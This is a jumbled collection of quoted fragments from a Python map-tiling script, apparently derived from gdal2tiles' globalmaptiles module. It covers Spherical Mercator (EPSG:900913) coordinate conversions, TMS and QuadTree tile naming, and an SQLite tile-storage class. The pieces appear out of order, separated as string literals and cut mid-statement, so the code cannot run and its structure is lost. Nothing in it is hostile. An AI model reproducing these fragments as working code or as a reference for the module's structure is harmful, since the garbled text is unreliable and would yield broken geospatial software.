and z=?\", (x, y, z)) res = cur.fetchone() if", "zs in os.listdir(basedir): zz=int(zs) for xs in os.listdir(basedir+'/'+zs+'/'): xx=int(xs) for ys in os.listdir(basedir+'/'+zs+'/'+'/'+xs+'/'):", "GEOGCS[\"WGS 84\", DATUM[\"WGS_1984\", SPHEROID[\"WGS 84\",6378137,298.257223563, AUTHORITY[\"EPSG\",\"7030\"]], AUTHORITY[\"EPSG\",\"6326\"]], PRIMEM[\"Greenwich\",0], UNIT[\"degree\",0.0174532925199433], AUTHORITY[\"EPSG\",\"4326\"]], PROJECTION[\"Mercator_1SP\"], PARAMETER[\"central_meridian\",0], PARAMETER[\"scale_factor\",1],", "the coordinate origin is in the middle of extent. In fact you can", "datum, yeh? Yes, all lat/lon we are mentioning should use WGS84 Geodetic Datum.", "corner, reference is XYZ. Microsoft is referencing tiles by a QuadTree name, defined", "is the same (equal extent, projection, pixel size), there is just different identification", "(self.tileSize * 2**zoom) return self.initialResolution / (2**zoom) def ZoomForPixelSize(self, pixelSize ): \"Maximal scaledown", "WGS84 datum\" bounds = self.TileBounds( tx, ty, zoom) minLat, minLon = self.MetersToLatLon(bounds[0], bounds[1])", "None self.written = set() self.db.commit() self.pending_images = [] def open(self, filename) : \"\"\"", "def __init__(self, type): self.type=type def create(self, filename, overwrite=False): \"\"\" Create a new storage", "target=SqliteTileStorage('TMS') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select x, y, z from tiles\") res", "\"Maximal scaledown zoom of the pyramid closest to the pixelSize.\" for i in", "= tileSize self.initialResolution = 2 * math.pi * 6378137 / self.tileSize # 156543.03392804062", "sqlite file from a z/y/x.ext directory structure\"\"\" self.create(filename, overwrite) for zs in os.listdir(basedir):", "INDEX IND ON tiles(x,y,z,s) \"\"\") cur.execute(\"insert into info(desc, tilenumbering) values('Simple sqlite tile storage..',", "gdaltransform. All of the tools supports -t_srs 'epsg:900913'. 
For other GIS programs check", "to EPSG:900913\" mapSize = self.tileSize << zoom py = mapSize - pyr res", "not visually noticable. How do I create a raster in EPSG:900913 and convert", "2 bands: 1 grayscale, one alpha mask import sqlite3 import os import math", "TEXT, tilenumbering TEXT, minzoom int, maxzoom int) \"\"\") if CREATEINDEX: cur.execute( \"\"\" CREATE", "EPSG:900913 to pyramid pixel coordinates in given zoom level\" res = self.Resolution( zoom", "in WGS84 Datum to XY in Spherical Mercator EPSG:900913\" mx = lon *", "precision of an ellipsoidal projection. The spherical projection causes approximately 0.33 percent scale", "image from tiles where x=? and y=? and z=?\", (x, y, z)) res", "(\"None found\") return None def createFromDirectory(self, filename, basedir, overwrite=False) : \"\"\" Create a", "kilometers, the coordinate origin is in the middle of extent. In fact you", "Mercator projection, EPSG:900913 (EPSG:gOOglE, Google Maps Global Mercator), EPSG:3785, OSGEO:41001. Such tiles are", "& mask) != 0: digit += 1 if (ty & mask) != 0:", "(x, y, z) in res: xx= x zz= z yy= 2**zz - y", "\"\"\") if CREATEINDEX: cur.execute( \"\"\" CREATE INDEX IND ON tiles(x,y,z,s) \"\"\") cur.execute(\"insert into", "(x, y, z) in res: xx= x zz= 17 - z yy= 2**zz", "file \"\"\" self.writeImage(x, y, z, f.read()) def writeImage(self, x, y, z, image) :", "database. Proj4 Text: +proj=merc +a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0 +x_0=0.0 +y_0=0 +k=1.0 +units=m +nadgrids=@null", "as string \"\"\" cur = self.db.cursor() cur.execute(\"select image from tiles where x=? 
and", "* math.pi * 6378137 / 2.0 # 20037508.342789244 def LatLonToMeters(self, lat, lon ):", "0 mask = 1 << (i-1) if (tx & mask) != 0: digit", "minLat, minLon = self.MetersToLatLon(bounds[0], bounds[1]) maxLat, maxLon = self.MetersToLatLon(bounds[2], bounds[3]) return ( minLat,", "overwrite: if os.path.isfile(self.filename): os.unlink(self.filename) else: if os.path.isfile(self.filename): CREATEINDEX=False self.db = sqlite3.connect(self.filename) cur =", "coordinate origin is in the middle of extent. In fact you can calculate", "* 6378137 / 2.0 # 20037508.342789244 def LatLonToMeters(self, lat, lon ): \"Converts given", "(2 * math.atan( math.exp( lat * math.pi / 180.0)) - math.pi / 2.0)", "SqliteTileStorage(): \"\"\" Sqlite files methods for simple tile storage\"\"\" def __init__(self, type): self.type=type", "the spherical form of projection, not the ellipsoidal form. Since the projection is", "LatLonToMeters(self, lat, lon ): \"Converts given lat/lon in WGS84 Datum to XY in", "not if already exists\"\"\" self.filename=filename CREATEINDEX=True if overwrite: if os.path.isfile(self.filename): os.unlink(self.filename) else: if", "file (-addalpha) in 3857 projection (projection is forced due # to weird effect", "coordinates with PROJ.4? You can use standard GIS tools like gdalwarp, cs2cs or", "(x, y, z) in self.written: return self.written.add((x, y, z)) self.pending_images.append((z, x, y, 0,", "return None def createFromDirectory(self, filename, basedir, overwrite=False) : \"\"\" Create a new sqlite", "self.originShift / 180.0 my = math.log( math.tan((90 + lat) * math.pi / 360.0", "resolution is always divided by two initialResolution = 20037508.342789244 * 2 / 256", "of projection, not the ellipsoidal form. 
Since the projection is used only for", "None or z < self.minzoom: self.minzoom = z if self.maxzoom is None or", "a new sqlite file from a z/y/x.ext directory structure\"\"\" self.create(filename, overwrite) for zs", "return tx, ty #def PixelsToRaster(self, px, py, zoom): # \"Move the origin of", "for Google Maps, Yahoo Maps, Microsoft Maps compatible tiles - GlobalGeodetic (based on", "* 180.0 lat = 180 / math.pi * (2 * math.atan( math.exp( lat", "Earth compatible tiles More info at: http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification http://wiki.osgeo.org/wiki/WMS_Tiling_Client_Recommendation http://msdn.microsoft.com/en-us/library/bb259689.aspx http://code.google.com/apis/maps/documentation/overlays.html#Google_Maps_Coordinates Created by <NAME>", "zoom ) maxx, maxy = self.PixelsToMeters( (tx+1)*self.tileSize, (ty)*self.tileSize, zoom ) return ( minx,", "= self.db.cursor() cur.execute(\"select image from tiles where x=? and y=? and z=?\", (x,", "85 | gdaltransform -s_srs EPSG:4326 -t_srs EPSG:900913 Polar areas with abs(latitude) bigger then", "PixelsToRaster(self, px, py, zoom): # \"Move the origin of pixel coordinates to top-left", "(tx & mask) != 0: digit += 1 if (ty & mask) !=", "2.0 # 20037508.342789244 def LatLonToMeters(self, lat, lon ): \"Converts given lat/lon in WGS84", "( desc TEXT, tilenumbering TEXT, minzoom int, maxzoom int) \"\"\") if CREATEINDEX: cur.execute(", "= False): if len(self.pending_images) > 500 or force: cur = self.db.cursor() cur.executemany('insert into", "int, image blob, PRIMARY KEY(x,y,z,s)) \"\"\") cur.execute( \"\"\" CREATE TABLE IF NOT EXISTS", "cur = self.db.cursor() cur.executemany('insert into tiles (z, x, y,s,image) \\ values (?,?,?,?,?)', self.pending_images)", "scale up def GoogleTile(self, tx, ty, zoom): \"Converts TMS tile coordinates to Google", "under the open-source GDAL license (www.gdal.org). 
\"\"\" MAXZOOMLEVEL = 32 class GlobalMercator(object): \"\"\"", "return mx, my def MetersToPixels(self, mx, my, zoom): \"Converts EPSG:900913 to pyramid pixel", "self.minzoom = z if self.maxzoom is None or z > self.maxzoom: self.maxzoom =", "self.db.cursor() cur.executemany('insert into tiles (z, x, y,s,image) \\ values (?,?,?,?,?)', self.pending_images) self.pending_images =", "Text: +proj=merc +a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0 +x_0=0.0 +y_0=0 +k=1.0 +units=m +nadgrids=@null +no_defs Human", "= self.Resolution( zoom ) px = (mx + self.originShift) / res py =", "(?)\", (self.minzoom, self.maxzoom)) self.db.commit() def writeImageFile(self, x, y, z, f) : \"\"\" write", "= self.db.cursor() cur.execute(\"select x, y, z from tiles\") res = cur.fetchall() for (x,", "= EPSG:3785) for Google Maps, Yahoo Maps, Microsoft Maps compatible tiles - GlobalGeodetic", "TMS numbering scheme from a BigPlanet one\"\"\" target=SqliteTileStorage('TMS') target.create(targetname, overwrite) cur = self.db.cursor()", "z) : \"\"\" read a single tile as string \"\"\" cur = self.db.cursor()", "res - self.originShift my = py * res - self.originShift return mx, my", "180.0 return mx, my def MetersToLatLon(self, mx, my ): \"Converts XY point from", "given zoom level of pyramid to EPSG:900913\" mapSize = self.tileSize << zoom py", "contains classes implementing coordinate conversions for: - GlobalMercator (based on EPSG:900913 = EPSG:3785)", "approximately 0.33 percent scale distortion in the Y direction, which is not visually", "* math.pi / 180.0)) - math.pi / 2.0) return lat, lon def PixelsToMeters(self,", "my def MetersToPixels(self, mx, my, zoom): \"Converts EPSG:900913 to pyramid pixel coordinates in", "# to weird effect in AutoCreateWarpedVRT) # 2 bands: 1 grayscale, one alpha", "top-left corner\" # # mapSize = self.tileSize << zoom # return px, mapSize", "xs in os.listdir(basedir+'/'+zs+'/'): xx=int(xs) for ys in os.listdir(basedir+'/'+zs+'/'+'/'+xs+'/'): yy=int(ys.split('.')[0]) 
print (zz, yy, xx)", "Proj4 Text: +proj=merc +a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0 +x_0=0.0 +y_0=0 +k=1.0 +units=m +nadgrids=@null +no_defs", "zoom py = mapSize - pyr res = self.Resolution( zoom ) mx =", "region is on top of pyramid (zoom=0) covered by 256x256 pixels tile, every", "ZoomForPixelSize(self, pixelSize ): \"Maximal scaledown zoom of the pyramid closest to the pixelSize.\"", "else: return False def close(self): self.commitData(force=True) cur = self.db.cursor() cur.execute(\"UPDATE Info SET minzoom", "tile name convention? The tile raster itself is the same (equal extent, projection,", "email: klokan at klokan dot cz. I would like to know where it", "ty, zoom): \"Returns bounds of the given tile in EPSG:900913 coordinates\" minx, miny", "px, mapSize - py def MetersToTile(self, mx, my, zoom): \"Returns tile for given", "py = mapSize - pyr res = self.Resolution( zoom ) mx = px", "the projection is used only for map display, and not for displaying numeric", "XYZ from TMS EPSG:4326 EPSG:900913 .----. --------- -- TMS / \\ <-> |", "in AutoCreateWarpedVRT) # 2 bands: 1 grayscale, one alpha mask import sqlite3 import", "them on top of base maps of those web mapping applications. Pixel and", "Maps, Yahoo Maps, Microsoft Maps compatible tiles - GlobalGeodetic (based on EPSG:4326) for", "EPSG:900913\" mapSize = self.tileSize << zoom py = mapSize - pyr res =", "in the official EPSG database. Proj4 Text: +proj=merc +a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0 +x_0=0.0", "-1): digit = 0 mask = 1 << (i-1) if (tx & mask)", "\"Resolution (meters/pixel) for given zoom level (measured at Equator)\" # return (2 *", "or find it usefull for your project please let me know. My email:", "x=? and y=? 
and z=?\", (x, y, z)) res = cur.fetchone() if res:", "/ math.pi * (2 * math.atan( math.exp( lat * math.pi / 180.0)) -", "z self.commitData() def commitData(self, force = False): if len(self.pending_images) > 500 or force:", "Spherical Mercator Pixels in pyramid Tiles in pyramid lat/lon XY in metres XY", "web clients like Google Maps are projecting those coordinates by Spherical Mercator, so", "minx, miny = self.PixelsToMeters( tx*self.tileSize, (ty+1)*self.tileSize, zoom ) maxx, maxy = self.PixelsToMeters( (tx+1)*self.tileSize,", "there is just different identification of the same raster tile. Tiles in TMS", "official EPSG database. Proj4 Text: +proj=merc +a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0 +x_0=0.0 +y_0=0 +k=1.0", "already exists\"\"\" self.filename=filename CREATEINDEX=True if overwrite: if os.path.isfile(self.filename): os.unlink(self.filename) else: if os.path.isfile(self.filename): CREATEINDEX=False", "is degined as EPSG:3785. WKT definition is in the official EPSG database. Proj4", "f.read()) def writeImage(self, x, y, z, image) : \"\"\" write a single tile", "Maps Global Mercator), EPSG:3785, OSGEO:41001. Such tiles are compatible with Google Maps, Microsoft", "the projection: More info at http://spatialreference.org/ref/user/google-projection/ The same projection is degined as EPSG:3785.", "AUTHORITY[\"EPSG\",\"6326\"]], PRIMEM[\"Greenwich\",0], UNIT[\"degree\",0.0174532925199433], AUTHORITY[\"EPSG\",\"4326\"]], PROJECTION[\"Mercator_1SP\"], PARAMETER[\"central_meridian\",0], PARAMETER[\"scale_factor\",1], PARAMETER[\"false_easting\",0], PARAMETER[\"false_northing\",0], UNIT[\"metre\",1, AUTHORITY[\"EPSG\",\"9001\"]]] \"\"\" def", "AUTHORITY[\"EPSG\",\"9001\"]]] \"\"\" def __init__(self, tileSize=256): \"Initialize the TMS Global Mercator pyramid\" self.tileSize =", "EPSG:900913? whole region is on top of pyramid (zoom=0) covered by 256x256 pixels", "abs(latitude) bigger then 85.05112878 are clipped off. 
What are zoom level constants (pixels/meter)", "EPSG database. Proj4 Text: +proj=merc +a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0 +x_0=0.0 +y_0=0 +k=1.0 +units=m", "corner\" # # mapSize = self.tileSize << zoom # return px, mapSize -", "zoom): \"Returns tile for given mercator coordinates\" px, py = self.MetersToPixels( mx, my,", "AUTHORITY[\"EPSG\",\"7030\"]], AUTHORITY[\"EPSG\",\"6326\"]], PRIMEM[\"Greenwich\",0], UNIT[\"degree\",0.0174532925199433], AUTHORITY[\"EPSG\",\"4326\"]], PROJECTION[\"Mercator_1SP\"], PARAMETER[\"central_meridian\",0], PARAMETER[\"scale_factor\",1], PARAMETER[\"false_easting\",0], PARAMETER[\"false_northing\",0], UNIT[\"metre\",1, AUTHORITY[\"EPSG\",\"9001\"]]] \"\"\"", "Datum\" lon = (mx / self.originShift) * 180.0 lat = (my / self.originShift)", "__init__(self, tileSize=256): \"Initialize the TMS Global Mercator pyramid\" self.tileSize = tileSize self.initialResolution =", "/ self.originShift) * 180.0 lat = (my / self.originShift) * 180.0 lat =", "* 2**zoom) return self.initialResolution / (2**zoom) def ZoomForPixelSize(self, pixelSize ): \"Maximal scaledown zoom", "CREATEINDEX=False self.db = sqlite3.connect(self.filename) cur = self.db.cursor() cur.execute( \"\"\" CREATE TABLE IF NOT", "Google Maps/QuadTree tile name convention? The tile raster itself is the same (equal", "coordinate extent of Earth in EPSG:900913? [-20037508.342789244, -20037508.342789244, 20037508.342789244, 20037508.342789244] Constant 20037508.342789244 comes", "Code 2008, project GDAL2Tiles for OSGEO. In case you use this class in", "19288 2010-04-02 18:36:17Z rouault $ # VERSION MODIFIED FROM ORIGINAL, come with no", "Google Summer of Code 2008, project GDAL2Tiles for OSGEO. 
In case you use", "Pixels <-> Tile WGS84 coordinates Spherical Mercator Pixels in pyramid Tiles in pyramid", "self.TileLatLonBounds(tx, ty, zoom) p2_lat, p2_lon, _ , _ = self.TileLatLonBounds(tx+1, ty, zoom) p4_lat,", "/ float(self.tileSize) ) - 1 ) return tx, ty #def PixelsToRaster(self, px, py,", "a new storage file, overwrite or not if already exists\"\"\" self.filename=filename CREATEINDEX=True if", "In case you use this class in your product, translate it to another", "zoom) minLat, minLon = self.MetersToLatLon(bounds[0], bounds[1]) maxLat, maxLon = self.MetersToLatLon(bounds[2], bounds[3]) return (", "* 2 / 256 = 156543.03392804062 What is the difference between TMS and", "p1_lon, p3_lat, p3_lon = self.TileLatLonBounds(tx, ty, zoom) p2_lat, p2_lon, _ , _ =", "cur.execute(\"insert into info(desc, tilenumbering) values('Simple sqlite tile storage..', (?))\", (self.type, )) self.minzoom =", "x zz= 17 - z yy= 2**zz - y -1 im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def", "of the projection: More info at http://spatialreference.org/ref/user/google-projection/ The same projection is degined as", "of the tools supports -t_srs 'epsg:900913'. For other GIS programs check the exact", "fact you can calculate the constant as: 2 * math.pi * 6378137 /", "[0,0] in the bottom-left corner, id is XYZ. Google placed the origin [0,0]", "+b=6378137 +lat_ts=0.0 +lon_0=0.0 +x_0=0.0 +y_0=0 +k=1.0 +units=m +nadgrids=@null +no_defs Human readable WKT format", "if already exists\"\"\" self.filename=filename CREATEINDEX=True if overwrite: if os.path.isfile(self.filename): os.unlink(self.filename) else: if os.path.isfile(self.filename):", "= str(res[0]) return image else : print (\"None found\") return None def createFromDirectory(self,", "can calculate the constant as: 2 * math.pi * 6378137 / 2.0 $", "the difference between TMS and Google Maps/QuadTree tile name convention? The tile raster", "EPSG:900913 Polar areas with abs(latitude) bigger then 85.05112878 are clipped off. 
What are", "+ self.originShift) / res mapSize = self.tileSize << zoom return px, mapSize -", "zoom of the pyramid closest to the pixelSize.\" for i in range(MAXZOOMLEVEL): if", "= 180 / math.pi * (2 * math.atan( math.exp( lat * math.pi /", "* res - self.originShift my = py * res - self.originShift return mx,", "TABLE IF NOT EXISTS tiles ( x int, y int, z int, s", "of pyramid (zoom=0) covered by 256x256 pixels tile, every lower zoom level resolution", "the given tile in EPSG:900913 coordinates\" minx, miny = self.PixelsToMeters( tx*self.tileSize, (ty+1)*self.tileSize, zoom", "zoom) return self.PixelsToTile( px, py) def TileBounds(self, tx, ty, zoom): \"Returns bounds of", "my, zoom): \"Returns tile for given mercator coordinates\" px, py = self.MetersToPixels( mx,", "self.maxzoom = None self.written = set() self.db.commit() self.pending_images = [] def open(self, filename)", "float(self.tileSize) ) - 1 ) return tx, ty #def PixelsToRaster(self, px, py, zoom):", "-t_srs EPSG:900913 Polar areas with abs(latitude) bigger then 85.05112878 are clipped off. What", "y, z) in res: xx= x zz= 17 - z yy= 2**zz -", "ty, zoom) p2_lat, p2_lon, _ , _ = self.TileLatLonBounds(tx+1, ty, zoom) p4_lat, p4_lon,", "alpha mask import sqlite3 import os import math __version__ = \"$Id: gdal2tiles.py 19288", "in TMS are counted from [0,0] in the bottom-left corner, id is XYZ.", "is None or z < self.minzoom: self.minzoom = z if self.maxzoom is None", "me know. My email: klokan at klokan dot cz. 
I would like to", "(self.minzoom, self.maxzoom)) self.db.commit() def writeImageFile(self, x, y, z, f) : \"\"\" write a", "1) - ty def QuadTree(self, tx, ty, zoom ): \"Converts TMS tile coordinates", "a new sqlite with TMS numbering scheme from a OSM/Bing/Googlemaps one\"\"\" target=SqliteTileStorage('TMS') target.create(targetname,", "= (my + self.originShift) / res mapSize = self.tileSize << zoom return px,", "http://spatialreference.org/ref/user/google-projection/ The same projection is degined as EPSG:3785. WKT definition is in the", "/ self.originShift) * 180.0 lat = 180 / math.pi * (2 * math.atan(", "ty for i in range(zoom, 0, -1): digit = 0 mask = 1", "84\", DATUM[\"WGS_1984\", SPHEROID[\"WGS 84\",6378137,298.257223563, AUTHORITY[\"EPSG\",\"7030\"]], AUTHORITY[\"EPSG\",\"6326\"]], PRIMEM[\"Greenwich\",0], UNIT[\"degree\",0.0174532925199433], AUTHORITY[\"EPSG\",\"4326\"]], PROJECTION[\"Mercator_1SP\"], PARAMETER[\"central_meridian\",0], PARAMETER[\"scale_factor\",1], PARAMETER[\"false_easting\",0],", "tx = int( math.ceil( px / float(self.tileSize) ) - 1 ) ty =", "treated as if the were on the WGS84 ellipsoid. From MSDN documentation: To", "tx, ty, zoom): \"Converts TMS tile coordinates to Google Tile coordinates\" # coordinate", "def GoogleTile(self, tx, ty, zoom): \"Converts TMS tile coordinates to Google Tile coordinates\"", "Global Mercator), EPSG:3785, OSGEO:41001. 
Such tiles are compatible with Google Maps, Microsoft Virtual", "= sqlite3.connect(self.filename) cur = self.db.cursor() cur.execute( \"\"\" CREATE TABLE IF NOT EXISTS tiles", "tiles - GlobalGeodetic (based on EPSG:4326) for OpenLayers Base Map and Google Earth", "+no_defs Human readable WKT format of EPGS:900913: PROJCS[\"Google Maps Global Mercator\", GEOGCS[\"WGS 84\",", "= lon * self.originShift / 180.0 my = math.log( math.tan((90 + lat) *", "my ): \"Converts XY point from Spherical Mercator EPSG:900913 to lat/lon in WGS84", "1) - ty for i in range(zoom, 0, -1): digit = 0 mask", "res = self.Resolution( zoom ) mx = px * res - self.originShift my", "def TileLatLonBounds(self, tx, ty, zoom ): \"Returns bounds of the given tile in", "mx, my, zoom) return self.PixelsToTile( px, py) def TileBounds(self, tx, ty, zoom): \"Returns", "coordinates to Microsoft QuadTree\" quadKey = \"\" ty = (2**zoom - 1) -", "z if self.maxzoom is None or z > self.maxzoom: self.maxzoom = z self.commitData()", "p4_lat, p4_lon, _, _ = self.TileLatLonBounds(tx, ty-1, zoom) return (p1_lat, p1_lon, p2_lat, p2_lon,", "print (basedir+'/'+zs+'/'+'/'+xs+'/'+ys) f=open(basedir+'/'+zs+'/'+'/'+xs+'/'+ys) self.writeImageFile(x, y, z, f) #cur.execute('insert into tiles (z, x, y,image)", "def createTMSFromOSM(self, targetname, overwrite=False): \"\"\" Create a new sqlite with TMS numbering scheme", "_ = self.TileLatLonBounds(tx+1, ty, zoom) p4_lat, p4_lon, _, _ = self.TileLatLonBounds(tx, ty-1, zoom)", "write a single tile from string \"\"\" if (x, y, z) in self.written:", "To simplify the calculations, we use the spherical form of projection, not the", "20037508.342789244 comes from the circumference of the Earth in meters, which is 40", "EPSG:900913 (EPSG:gOOglE, Google Maps Global Mercator), EPSG:3785, OSGEO:41001. 
Such tiles are compatible with", "corner of the extent return tx, (2**zoom - 1) - ty def QuadTree(self,", "at Equator)\" # return (2 * math.pi * 6378137) / (self.tileSize * 2**zoom)", "CREATE TABLE IF NOT EXISTS tiles ( x int, y int, z int,", "using WGS84 datum\" bounds = self.TileBounds( tx, ty, zoom) minLat, minLon = self.MetersToLatLon(bounds[0],", "/------------/ KML, public WebMapService Web Clients TileMapService What is the coordinate extent of", "digit += 1 if (ty & mask) != 0: digit += 2 quadKey", "2**zz - y -1 im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createTMSFromBigPlanet(self, targetname, overwrite=False): \"\"\" Create a", "PARAMETER[\"false_northing\",0], UNIT[\"metre\",1, AUTHORITY[\"EPSG\",\"9001\"]]] \"\"\" def __init__(self, tileSize=256): \"Initialize the TMS Global Mercator pyramid\"", "> self.Resolution(i): if i!=0: return i-1 else: return 0 # We don't want", "_, _ = self.TileLatLonBounds(tx, ty-1, zoom) return (p1_lat, p1_lon, p2_lat, p2_lon, p3_lat, p3_lon,", "(zz, yy, xx) z=zz x=xx y=yy print (basedir+'/'+zs+'/'+'/'+xs+'/'+ys) f=open(basedir+'/'+zs+'/'+'/'+xs+'/'+ys) self.writeImageFile(x, y, z, f)", "methods for simple tile storage\"\"\" def __init__(self, type): self.type=type def create(self, filename, overwrite=False):", "createTMSFromOSM(self, targetname, overwrite=False): \"\"\" Create a new sqlite with TMS numbering scheme from", "lat = 180 / math.pi * (2 * math.atan( math.exp( lat * math.pi", "6378137 / 2.0 $ echo 180 85 | gdaltransform -s_srs EPSG:4326 -t_srs EPSG:900913", "vrt file (-addalpha) in 3857 projection (projection is forced due # to weird", "displaying numeric coordinates, we don't need the extra precision of an ellipsoidal projection.", "PRIMARY KEY(x,y,z,s)) \"\"\") cur.execute( \"\"\" CREATE TABLE IF NOT EXISTS info ( desc", "def writeImageFile(self, x, y, z, f) : \"\"\" write a single tile from", "True else: return False def close(self): self.commitData(force=True) cur = self.db.cursor() 
cur.execute(\"UPDATE Info SET", "- 1 ) return tx, ty #def PixelsToRaster(self, px, py, zoom): # \"Move", "values('Simple sqlite tile storage..', (?))\", (self.type, )) self.minzoom = None self.maxzoom = None", "EPSG:900913 = EPSG:3785) for Google Maps, Yahoo Maps, Microsoft Maps compatible tiles -", "it to another language or find it usefull for your project please let", "18:36:17Z rouault $ # VERSION MODIFIED FROM ORIGINAL, come with no warranty #", "type): self.type=type def create(self, filename, overwrite=False): \"\"\" Create a new storage file, overwrite", "target.writeImage(xx,yy,zz,im) def createTMSFromBigPlanet(self, targetname, overwrite=False): \"\"\" Create a new sqlite with TMS numbering", "usefull for your project please let me know. My email: klokan at klokan", "web. It contains classes implementing coordinate conversions for: - GlobalMercator (based on EPSG:900913", "Global Map Tiles as defined in Tile Map Service (TMS) Profiles ============================================================== Functions", "mask) != 0: digit += 1 if (ty & mask) != 0: digit", "a single tile from a file \"\"\" self.writeImage(x, y, z, f.read()) def writeImage(self,", "self.originShift / 180.0 return mx, my def MetersToLatLon(self, mx, my ): \"Converts XY", "my def MetersToLatLon(self, mx, my ): \"Converts XY point from Spherical Mercator EPSG:900913", "an existing file\"\"\" self.filename=filename if os.path.isfile(self.filename): self.db = sqlite3.connect(self.filename) return True else: return", "z yy= 2**zz - y -1 im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createTMSFromBigPlanet(self, targetname, overwrite=False): \"\"\"", "DATUM[\"WGS_1984\", SPHEROID[\"WGS 84\",6378137,298.257223563, AUTHORITY[\"EPSG\",\"7030\"]], AUTHORITY[\"EPSG\",\"6326\"]], PRIMEM[\"Greenwich\",0], UNIT[\"degree\",0.0174532925199433], AUTHORITY[\"EPSG\",\"4326\"]], PROJECTION[\"Mercator_1SP\"], PARAMETER[\"central_meridian\",0], PARAMETER[\"scale_factor\",1], 
PARAMETER[\"false_easting\",0], PARAMETER[\"false_northing\",0],", "ellipsoidal form. Since the projection is used only for map display, and not", "PRIMEM[\"Greenwich\",0], UNIT[\"degree\",0.0174532925199433], AUTHORITY[\"EPSG\",\"4326\"]], PROJECTION[\"Mercator_1SP\"], PARAMETER[\"central_meridian\",0], PARAMETER[\"scale_factor\",1], PARAMETER[\"false_easting\",0], PARAMETER[\"false_northing\",0], UNIT[\"metre\",1, AUTHORITY[\"EPSG\",\"9001\"]]] \"\"\" def __init__(self,", "Resolution(self, zoom ): \"Resolution (meters/pixel) for given zoom level (measured at Equator)\" #", "a TMS one\"\"\" target=SqliteTileStorage('BigPlanet') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select x, y, z", "for OpenLayers Base Map and Google Earth compatible tiles More info at: http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification", "level of pyramid to EPSG:900913\" mapSize = self.tileSize << zoom py = mapSize", "# VERSION MODIFIED FROM ORIGINAL, come with no warranty # <NAME> # input:", "overwrite=False) : \"\"\" Create a new sqlite file from a z/y/x.ext directory structure\"\"\"", "360.0 )) / (math.pi / 180.0) my = my * self.originShift / 180.0", "tx, ty, zoom): \"Returns bounds of the given tile in EPSG:900913 coordinates\" minx,", "$ echo 180 85 | gdaltransform -s_srs EPSG:4326 -t_srs EPSG:900913 Polar areas with", "return self.written.add((x, y, z)) self.pending_images.append((z, x, y, 0, sqlite3.Binary(image))) if self.minzoom is None", "info(desc, tilenumbering) values('Simple sqlite tile storage..', (?))\", (self.type, )) self.minzoom = None self.maxzoom", "in fact lat/lon coordinates on sphere are treated as if the were on", "im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) # ============================================================================= # ============================================================================= # ============================================================================= __doc__globalmaptiles = 
\"\"\" globalmaptiles.py Global", "ellipsoid. From MSDN documentation: To simplify the calculations, we use the spherical form", "name, defined on the website: http://msdn2.microsoft.com/en-us/library/bb259689.aspx The lat/lon coordinates are using WGS84 datum,", "weird effect in AutoCreateWarpedVRT) # 2 bands: 1 grayscale, one alpha mask import", "int, z int, s int, image blob, PRIMARY KEY(x,y,z,s)) \"\"\") cur.execute( \"\"\" CREATE", "p2_lon, p3_lat, p3_lon, p4_lat, p4_lon) def Resolution(self, zoom ): \"Resolution (meters/pixel) for given", "minLat, minLon, maxLat, maxLon ) def TileLatLonCorners(self, tx, ty, zoom ): p1_lat, p1_lon,", "px = (mx + self.originShift) / res py = (my + self.originShift) /", "used. Class is available under the open-source GDAL license (www.gdal.org). \"\"\" MAXZOOMLEVEL =", "sqlite tile storage..', (?))\", (self.type, )) self.minzoom = None self.maxzoom = None self.written", "not for displaying numeric coordinates, we don't need the extra precision of an", "on top of pyramid (zoom=0) covered by 256x256 pixels tile, every lower zoom", "OSM/Bing/Googlemaps one\"\"\" target=SqliteTileStorage('TMS') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select x, y, z from", "= (?), maxzoom = (?)\", (self.minzoom, self.maxzoom)) self.db.commit() def writeImageFile(self, x, y, z,", "basedir, overwrite=False) : \"\"\" Create a new sqlite file from a z/y/x.ext directory", "in os.listdir(basedir): zz=int(zs) for xs in os.listdir(basedir+'/'+zs+'/'): xx=int(xs) for ys in os.listdir(basedir+'/'+zs+'/'+'/'+xs+'/'): yy=int(ys.split('.')[0])", "Such tiles are compatible with Google Maps, Microsoft Virtual Earth, Yahoo Maps, UK", "* 6378137 / self.tileSize # 156543.03392804062 for tileSize 256 pixels self.originShift = 2", "image else : print (\"None found\") return None def createFromDirectory(self, filename, basedir, overwrite=False)", "# From $Id: gdal2tiles.py 19288 2010-04-02 18:36:17Z rouault $ # VERSION MODIFIED FROM", 
"in the middle of extent. In fact you can calculate the constant as:", "84\",6378137,298.257223563, AUTHORITY[\"EPSG\",\"7030\"]], AUTHORITY[\"EPSG\",\"6326\"]], PRIMEM[\"Greenwich\",0], UNIT[\"degree\",0.0174532925199433], AUTHORITY[\"EPSG\",\"4326\"]], PROJECTION[\"Mercator_1SP\"], PARAMETER[\"central_meridian\",0], PARAMETER[\"scale_factor\",1], PARAMETER[\"false_easting\",0], PARAMETER[\"false_northing\",0], UNIT[\"metre\",1, AUTHORITY[\"EPSG\",\"9001\"]]]", "y, z) in self.written: return self.written.add((x, y, z)) self.pending_images.append((z, x, y, 0, sqlite3.Binary(image)))", "for (x, y, z) in res: xx= x zz= z yy= 2**zz -", "minzoom = (?), maxzoom = (?)\", (self.minzoom, self.maxzoom)) self.db.commit() def writeImageFile(self, x, y,", "the ellipsoidal form. Since the projection is used only for map display, and", "for ys in os.listdir(basedir+'/'+zs+'/'+'/'+xs+'/'): yy=int(ys.split('.')[0]) print (zz, yy, xx) z=zz x=xx y=yy print", ") def TileLatLonCorners(self, tx, ty, zoom ): p1_lat, p1_lon, p3_lat, p3_lon = self.TileLatLonBounds(tx,", "to Microsoft QuadTree\" quadKey = \"\" ty = (2**zoom - 1) - ty", "/----/ <-> Google \\ / | | /--------/ QuadTree ----- --------- /------------/ KML,", "py / float(self.tileSize) ) - 1 ) return tx, ty #def PixelsToRaster(self, px,", "Mercator, so in fact 